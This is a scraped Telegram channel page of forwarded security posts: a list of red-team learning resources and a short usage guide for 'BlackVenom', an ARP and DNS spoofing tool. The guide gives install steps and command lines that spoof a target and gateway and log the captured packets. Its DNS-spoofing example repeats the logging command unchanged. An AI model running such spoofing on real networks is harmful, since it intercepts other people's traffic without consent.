UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.2K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
Forwarded from Exploiting Crew (Pr1vAt3)
πŸ¦‘π…π‘π„π„ π‘π„π’πŽπ”π‘π‚π„π’ - 𝐑𝐄𝐃 π“π„π€πŒ

Pentesting is primarily concerned with identifying and exploiting vulnerabilities within a specific target system, striving to uncover as many weaknesses as possible.
This process aids in shoring up an organization's defenses by pinpointing areas of vulnerability.

On the other hand, a red team engagement shifts its focus. Instead of merely finding vulnerabilities, it aims to assess an organization's defensive capabilities by simulating real-world attacks.
The goal is to evaluate how well the organization can detect and respond to these simulated threat actors.

You will find below a list of resources for Red Teaming.

πŸ‘‰π—ͺ𝗛𝗔𝗧 π—œπ—¦ π—₯π—˜π—— π—§π—˜π—”π— ?
🌟Red Team definition, redteam guide by Joe Vest & James Tubberville
https://lnkd.in/eUaZcWvg

🌟Red Teaming Handbook, UK Ministry of Defense
https://lnkd.in/euUkwQRq

πŸ‘‰π—ͺ𝗛𝗔𝗧 𝗔π—₯π—˜ π—₯π—˜π—— π—§π—˜π—”π—  π—˜π—«π—˜π—₯π—–π—œπ—¦π—˜π—¦?
🌟NIST’s Definition of Red Team Exercise
https://lnkd.in/eZVzn5AW

🌟Red Team Plan by Magoo
https://lnkd.in/eFUBzxEY

πŸ‘‰π—§π—˜π—–π—›π—‘π—œπ—€π—¨π—˜π—¦ 𝗔𝗑𝗗 π— π—˜π—§π—›π—’π——π—’π—Ÿπ—’π—šπ—œπ—˜π—¦
🌟MITRE ATT&CK Matrix for Enterprise
https://attack.mitre.org/

🌟Red Team Guides by Joe Vest & James Tubberville
https://lnkd.in/eXPxchUk

🌟Red Team Operations Part 1 and 2 Joas A Santos
https://lnkd.in/e7m3XzE7
https://lnkd.in/es7uSQA4

🌟Red Team Notes 2.0 by dmcxblue
https://lnkd.in/ekGaQASx

πŸ‘‰π—–π—’π—¨π—₯π—¦π—˜π—¦ 𝗔𝗑𝗗 𝗛𝗔𝗑𝗗𝗦 𝗒𝗑
🌟Hackersploit Red Team Series (video and guide)
https://lnkd.in/ek5naA4Q
https://lnkd.in/e4U2tW2z

🌟Responsible Red Teaming by The Taggart Institute
https://lnkd.in/eur4_nFn

🌟Red Teaming rooms on TryHackMe
https://lnkd.in/e8G9eMS5
https://lnkd.in/eYa9mHmk
https://lnkd.in/eQcnuu-m

🌟Board games by Hadess | حادث
https://lnkd.in/ee2EEyEh

πŸ‘‰π—§π—’π—’π—Ÿπ—¦
🌟Red Teaming Toolkit by infosecn1nja
https://lnkd.in/e8VnsYVH

🌟Red Team tools by A-poc
https://lnkd.in/evPBDZRm

🌟Red Teaming Toolkit Collection by 0xsp
https://lnkd.in/eP7jNUE4

🌟Red Team Ops Cobalt
https://lnkd.in/euMjeFEx

πŸ‘‰π—•π—’π—‘π—¨π—¦
🌟Red Team Resources by J0hnBx
https://lnkd.in/eeYCQ-Db

🌟Red Team Village talks
https://lnkd.in/eHwKj5gB

🌟A Beginner's Guide to Obfuscation by BC Security
https://lnkd.in/e92JuwPR

Full credit: Gabrielle B.
@UndercodeCommunity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from Exploiting Crew (Pr1vAt3)
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ¦‘ Cybersecurity 101 in one picture
1. Introduction to Cybersecurity
2. The CIA Triad
3. Common Cybersecurity Threats
4. Basic Defense Mechanisms
5. Cybersecurity Frameworks
6. Cybersecurity Ecosystem
Forwarded from Exploiting Crew (Pr1vAt3)
Forwarded from Exploiting Crew (Pr1vAt3)
Forwarded from Exploiting Crew (Pr1vAt3)
πŸ¦‘ARP and DNS Spoofing:


> Network Penetration Testing: Assess the security of networks by identifying weaknesses in ARP protocols and DNS resolutions. πŸ”πŸ›‘

>Security Auditing: Log and analyze network traffic to discover potential vulnerabilities and improve network defenses. πŸ“ŠπŸ”’

> Educational Purposes: Learn and teach network security concepts through practical, hands-on experience with ARP and DNS spoofing techniques. πŸŽ“πŸ“š

>Traffic Analysis: Monitor and capture traffic for forensic investigations or to understand user behavior on a network. πŸ”πŸ“ˆ


Installation πŸ› 
To install and run BlackVenom, follow these simple steps:

1️⃣ Create a Python Virtual Environment 🐍
First, create a virtual environment to manage dependencies:

python -m venv BlackVenom-Kali


2️⃣ Activate the Virtual Environment πŸ”‘
Activate the virtual environment:

source BlackVenom-Kali/bin/activate

3️⃣ Install Dependencies πŸ“¦
Now, install the necessary dependencies from the requirements.txt file:

pip install -r requirements.txt


> Run the Tool ⚑️ After installation, you can run BlackVenom using the provided CLI:
python black_venom_cli.py
Usage Examples
Example 1: Basic ARP Spoofing
This command performs a basic ARP spoofing attack between a target and a gateway without enabling packet logging or DNS spoofing. πŸ”—

sudo python black_venom_cli.py \
--target_ip 192.168.11.128 \
--gateway_ip 192.168.11.2 \
--interface eth0


Example 2: ARP Spoofing with Traffic Logging
In this example, packet logging is enabled while performing ARP spoofing. πŸ“

sudo python black_venom_cli.py \
--target_ip 192.168.11.128 \
--gateway_ip 192.168.11.2 \
--interface eth0 \
--enable_logging \
--log_file ~/Desktop/captured_packets.pcap
Example 3: ARP Spoofing and DNS Spoofing
This command enables both ARP spoofing and DNS spoofing, redirecting DNS requests for a specific domain. πŸŒπŸ”€


sudo python black_venom_cli.py \
--target_ip 192.168.11.128 \
--gateway_ip 192.168.11.2 \
--interface eth0 \
--enable_logging \
--log_file ~/Desktop/captured_packets.pcap


@UndercodeCommunity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁